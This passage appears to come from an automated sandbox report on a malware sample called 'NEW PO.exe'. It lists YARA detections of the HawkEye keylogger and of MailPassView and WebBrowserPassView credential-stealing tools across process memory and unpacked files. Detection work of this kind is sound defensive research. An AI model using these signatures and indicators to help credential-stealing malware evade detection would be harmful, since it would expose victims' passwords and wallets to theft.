00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x4a2429:$key: HawkEyeKeylogger 0x524449:$key: HawkEyeKeylogger 0x4a46a7:$salt: 099u787978786 0x5266c7:$salt: 099u787978786 0x4a2a86:$string1: HawkEye_Keylogger 0x4a38d9:$string1: HawkEye_Keylogger 0x4a4607:$string1: HawkEye_Keylogger 0x524aa6:$string1: HawkEye_Keylogger 0x5258f9:$string1: HawkEye_Keylogger 0x526627:$string1: HawkEye_Keylogger 0x4a2e6f:$string2: holdermail.txt 0x4a2e8f:$string2: holdermail.txt 0x524e8f:$string2: holdermail.txt 0x524eaf:$string2: holdermail.txt 0x4a2db1:$string3: wallet.dat 0x4a2dc9:$string3: wallet.dat 0x4a2ddf:$string3: wallet.dat 0x524dd1:$string3: wallet.dat 0x524de9:$string3: wallet.dat 0x524dff:$string3: wallet.dat 0x4a41cb:$string4: Keylog Records
00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x4a2ade:$hawkstr1: HawkEye Keylogger 0x4a391f:$hawkstr1: HawkEye Keylogger 0x4a3c4e:$hawkstr1: HawkEye Keylogger 0x4a3da9:$hawkstr1: HawkEye Keylogger 0x4a3f0c:$hawkstr1: HawkEye Keylogger 0x4a41a3:$hawkstr1: HawkEye Keylogger 0x524afe:$hawkstr1: HawkEye Keylogger 0x52593f:$hawkstr1: HawkEye Keylogger 0x525c6e:$hawkstr1: HawkEye Keylogger 0x525dc9:$hawkstr1: HawkEye Keylogger 0x525f2c:$hawkstr1: HawkEye Keylogger 0x5261c3:$hawkstr1: HawkEye Keylogger 0x4a2650:$hawkstr2: Dear HawkEye Customers! 0x4a3ca1:$hawkstr2: Dear HawkEye Customers! 0x4a3df8:$hawkstr2: Dear HawkEye Customers! 0x4a3f5f:$hawkstr2: Dear HawkEye Customers! 0x524670:$hawkstr2: Dear HawkEye Customers! 0x525cc1:$hawkstr2: Dear HawkEye Customers! 0x525e18:$hawkstr2: Dear HawkEye Customers! 0x525f7f:$hawkstr2: Dear HawkEye Customers! 0x4a2771:$hawkstr3: HawkEye Logger Details:
00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b659:$key: HawkEyeKeylogger 0x7d8d7:$salt: 099u787978786 0x7bcb6:$string1: HawkEye_Keylogger 0x7cb09:$string1: HawkEye_Keylogger 0x7d837:$string1: HawkEye_Keylogger 0x7c09f:$string2: holdermail.txt 0x7c0bf:$string2: holdermail.txt 0x7bfe1:$string3: wallet.dat 0x7bff9:$string3: wallet.dat 0x7c00f:$string3: wallet.dat 0x7d3fb:$string4: Keylog Records 0x7d713:$string4: Keylog Records 0x7d92f:$string5: do not script --> 0x7b641:$string6: \pidloc.txt 0x7b6cf:$string7: BSPLIT 0x7b6df:$string7: BSPLIT
00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd0e:$hawkstr1: HawkEye Keylogger 0x7cb4f:$hawkstr1: HawkEye Keylogger 0x7ce7e:$hawkstr1: HawkEye Keylogger 0x7cfd9:$hawkstr1: HawkEye Keylogger 0x7d13c:$hawkstr1: HawkEye Keylogger 0x7d3d3:$hawkstr1: HawkEye Keylogger 0x7b880:$hawkstr2: Dear HawkEye Customers! 0x7ced1:$hawkstr2: Dear HawkEye Customers! 0x7d028:$hawkstr2: Dear HawkEye Customers! 0x7d18f:$hawkstr2: Dear HawkEye Customers! 0x7b9a1:$hawkstr3: HawkEye Logger Details:
00000012.00000002.435207427.0000000003338000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000007.00000002.362383688.0000000002B10000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: NEW PO.exe PID: 7156	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: NEW PO.exe PID: 7156	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: NEW PO.exe PID: 7156	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: NEW PO.exe PID: 7156	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: NEW PO.exe PID: 6044	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: NEW PO.exe PID: 6044	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: NEW PO.exe PID: 6044	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: vbc.exe PID: 6728	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: WerFault.exe PID: 6724	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 6976	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 6976	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 6976	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 6976	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 7120	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 7120	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 7120	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 4816	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 4816	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 4816	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 4816	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 3996	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 3996	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: WindowsUpdate.exe PID: 3996	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: vbc.exe PID: 6828	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: vbc.exe PID: 5076	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Click to see the 200 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.0.NEW PO.exe.2d9bffc.45.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.2afd174.43.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.7ee0000.37.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.45fa72.29.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.45fa72.22.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.45fa72.19.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.8660000.48.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
22.0.vbc.exe.400000.2.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.35f1ffc.44.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.409c0d.39.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.8.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
18.0.WindowsUpdate.exe.409c0d.8.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.409c0d.8.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.409c0d.8.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.8.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.409c0d.14.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.39.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
10.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.2.NEW PO.exe.3ac2370.7.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.45fa72.14.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
18.0.WindowsUpdate.exe.45fa72.14.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.45fa72.14.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.45fa72.14.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.42d9930.33.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.42d9930.33.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.45fa72.9.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
7.0.NEW PO.exe.45fa72.9.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.9.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.45fa72.9.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
11.0.vbc.exe.400000.3.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.17.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
7.0.NEW PO.exe.45fa72.17.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.17.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.45fa72.17.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
16.2.WindowsUpdate.exe.409c0d.3.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.42f2370.34.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
10.0.vbc.exe.400000.3.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.2.WindowsUpdate.exe.8640000.9.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.45fa72.40.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.408208.17.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
18.0.WindowsUpdate.exe.408208.17.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.408208.17.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.408208.17.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.408208.17.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.408208.17.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.45fa72.17.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
16.0.WindowsUpdate.exe.45fa72.17.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.45fa72.17.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.45fa72.17.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.408208.40.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
18.0.WindowsUpdate.exe.408208.40.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.408208.40.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.408208.40.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.408208.40.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.408208.40.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
10.0.vbc.exe.400000.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.8.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
7.0.NEW PO.exe.408208.8.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.408208.8.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.408208.8.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.408208.8.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.8.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
11.2.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.7.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
7.0.NEW PO.exe.409c0d.7.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.7.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.409c0d.7.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.409c0d.7.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.45fa72.14.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
7.0.NEW PO.exe.45fa72.14.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.14.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
